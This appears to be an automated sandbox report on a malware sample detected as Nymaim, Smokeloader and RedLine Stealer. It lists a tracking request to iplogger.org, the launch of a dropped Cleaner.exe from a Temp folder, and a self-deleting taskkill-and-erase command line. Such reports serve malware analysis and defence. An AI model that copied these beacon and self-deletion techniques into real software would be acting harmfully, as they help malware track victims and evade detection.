2022-10-03 15:43:01 UTC	0	OUT	GET /1Pz8p7 HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 Host: iplogger.org Connection: Keep-Alive
2022-10-03 15:43:01 UTC	0	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Oct 2022 15:43:01 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close Set-Cookie: clhf03028ja=102.129.143.15; expires=Tue, 03-Oct-2023 15:43:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: 333625791719766799=2; expires=Tue, 03-Oct-2023 15:43:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Expires: Mon, 03 Oct 2022 15:43:01 +0000 Cache-Control: no-store, no-cache, must-revalidate Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN
2022-10-03 15:43:01 UTC	0	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 6136, Parent PID: 3452

General

Target ID:	0
Start time:	17:41:51
Start date:	03/10/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	238080 bytes
MD5 hash:	526FDE9E61B1B4835885973331FA1616
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.279758880.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.249294032.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.242144552.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.256623914.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.256985084.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.260710969.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.257076195.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.248840662.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.284332741.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.279883585.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.252473091.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.279213027.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.260888078.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.242004728.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.261380699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.285645764.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.279352370.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.241291964.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.284571510.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265965257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.242584776.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.266223376.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265443636.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.253125485.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.265525344.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.249185873.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.248750615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.256511336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.242671157.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.285927973.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.261685846.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.252969697.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.252332121.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: WerFault.exePID: 6120, Parent PID: 6136

General

Target ID:	2
Start time:	17:41:54
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 532
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WerFault.exePID: 3016, Parent PID: 6136

General

Target ID:	4
Start time:	17:41:57
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WerFault.exePID: 4728, Parent PID: 6136

General

Target ID:	6
Start time:	17:41:59
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WerFault.exePID: 4156, Parent PID: 6136

General

Target ID:	8
Start time:	17:42:01
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 720
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WerFault.exePID: 2140, Parent PID: 6136

General

Target ID:	10
Start time:	17:42:03
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 776
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WerFault.exePID: 4708, Parent PID: 6136

General

Target ID:	12
Start time:	17:42:06
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 868
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WerFault.exePID: 5928, Parent PID: 6136

General

Target ID:	14
Start time:	17:42:11
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 880
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WerFault.exePID: 1680, Parent PID: 6136

General

Target ID:	20
Start time:	17:42:15
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 976
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: WerFault.exePID: 1324, Parent PID: 6136

General

Target ID:	27
Start time:	17:42:38
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1268
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 5144, Parent PID: 6136

General

Target ID:	28
Start time:	17:42:39
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 5112, Parent PID: 5144

General

Target ID:	29
Start time:	17:42:40
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: Cleaner.exePID: 4628, Parent PID: 5144

General

Target ID:	30
Start time:	17:42:40
Start date:	03/10/2022
Path:	C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe"
Imagebase:	0x22e68860000
File size:	3947920 bytes
MD5 hash:	04514BD4962F7D60679434E0EBE49184
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 29%, ReversingLabs

Analysis Process: WerFault.exePID: 5216, Parent PID: 6136

General

Target ID:	32
Start time:	17:43:10
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1556
Imagebase:	0x7ff6da640000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 6044, Parent PID: 6136

General

Target ID:	35
Start time:	17:44:12
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 6060, Parent PID: 6044

General

Target ID:	36
Start time:	17:44:12
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exePID: 6080, Parent PID: 6044

General

Target ID:	37
Start time:	17:44:12
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im "file.exe" /f
Imagebase:	0xe10000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

⊘No disassembly